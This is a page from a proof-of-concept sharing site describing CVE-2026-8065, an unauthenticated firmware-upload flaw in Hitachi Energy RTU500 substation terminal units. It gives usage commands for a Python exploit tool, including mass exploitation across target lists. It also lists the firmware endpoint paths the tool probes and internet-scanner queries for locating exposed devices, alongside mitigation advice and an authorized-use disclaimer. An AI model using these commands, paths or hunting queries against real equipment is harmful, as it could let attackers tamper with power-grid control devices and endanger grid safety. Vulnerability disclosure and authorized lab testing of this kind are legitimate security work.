POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
IoT / OTcritical

CVE-2026-8065 — Hitachi Energy RTU500 Unauthenticated Firmware Update Bypass

September 29, 2026 · 581 views

Hitachi Energy RTU500 Series CMU firmware: CWE-306 missing authentication on the firmware update HTTP endpoint — unauthenticated arbitrary firmware upload via crafted POST (CVSS 3.1 9.1 Critical, IoT/OT). Affected CMU lines include 9.0 and 12.0 per vendor advisory. Python PoC: RTU500 fingerprint, path probe, lab-safe upload test, check + mass exploit -j. Authorized OT/lab only.

#iot#ot#ics#scada#hitachi#rtu500#firmware#authentication-bypass#cwe-306#unauthenticated#critical#energy

CVE:

CVE-2026-8065

Date:

2026-09-29

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-8065 — Hitachi Energy RTU500 Series CMU Firmware — authentication bypass (CWE-306) on the firmware update HTTP endpoint. CVSS 3.1 9.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H).

| | | |---|---| | Product | RTU500 remote terminal unit (substation / grid OT) | | Issue | Unauthenticated access to firmware update function | | Impact | Arbitrary firmware upload → integrity / availability of field RTU | | CWE | CWE-306 Missing Authentication for Critical Function | | Distinct from | CVE-2024-2617 (authenticated bypass of secure update when disabled) |

Vendor (CNA) text: an unauthenticated attacker can upload arbitrary firmware through a crafted POST to the firmware update endpoint.

Affected (vendor): RTU500 CMU firmware 9.0 and 12.0 version lines — follow Hitachi Energy advisory for 13.8.2+ patch guidance and exact fixed builds.

PoC page: https://pocbit.org/pocs/cve-2026-8065

GitHub: murrez/CVE-2026-8065

Bundled tool (Python 3)

Download poc.py from this page (View exploit code).

pip install -r requirements.txt

python poc.py --lab

python poc.py -u https://192.168.1.10 --mode check
python poc.py -u https://192.168.1.10 --mode exploit --dry-run
python poc.py -u https://192.168.1.10 --mode exploit
python poc.py -u https://192.168.1.10 --mode exploit --firmware-paths /api/firmware/update

python poc.py --list targets.example.txt --mode check -j 40
python poc.py --list hits.txt --mode exploit -j 8 --timeout 25

| Mode | Behavior | |------|----------| | check | Multi-port HTTP(S), RTU500 HTML markers, CMU version regex, GET on firmware path candidates | | exploit | POST multipart probe blob (POCBIT-8065-FW-PROBE) without session; exploited on 2xx + accept heuristics | | mass | --list + -j → hits.txt, exploited.txt | | --dry-run | Exploit: GET probe only, no POST | | --lab | Local mock RTU500 sanity check | | --force | Exploit without strong RTU500 HTML fingerprint | | --firmware-paths | Comma-separated URI override when vendor publishes exact path |

Default exploit payload is not a valid CMU flash image — marker + padding for detection only. Never run exploit mode against live grid equipment without isolation and vendor coordination.

Check vs exploit expectations

Bulk check defaults are tuned for FOFA-scale lists (short timeouts, limited GET per target). Check hit ≠ confirmed RTU: pages with only Hitachi Energy branding may be vendor_branding_only false positives. Strong fingerprints include rtu500, rtutil500, CMU firmware markers before treating exploit results as meaningful.

Default firmware path candidates

PoC rotates GET/POST paths including:

  • /api/firmware/update, /api/firmware/upload, /api/v1/firmware/update
  • /firmware/update, /firmware/upload, /ws/firmware/update
  • /CMU/firmware/upload, /ConfigurationManagement/Firmware
  • /configuration/management/firmware, /FileUpload/Firmware
  • /scripts/firmwareUpload, /cgi-bin/firmware, /admin/firmware/upload

When Hitachi publishes the exact URI, set --firmware-paths to that path only.

Mitigation

  1. Apply Hitachi Energy security advisory / CMU firmware per publisher.hitachienergy.com (CVE-2026-8065).
  2. Network segmentation — do not expose RTU web UI to the internet; jump host + MFA.
  3. Monitor anomalous firmware POST and configuration changes.
  4. Align with IEC 62351-3 and secure-update policies (see CVE-2024-2617 hardening context).

Hunting (examples)

title="RTU500" || body="RTU500" || body="Configuration Management"
body="Hitachi Energy" && (body="RTU" || body="CMU")
body="RTUtil500" || body="rtutil500"

OT networks may be absent from internet scanners — use CMMS / IP plans / VPN inventory for targets.txt.

Legal and ethical use

Authorized substation or isolated lab testing only. Unauthorized firmware manipulation on OT devices may violate law and grid safety rules.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →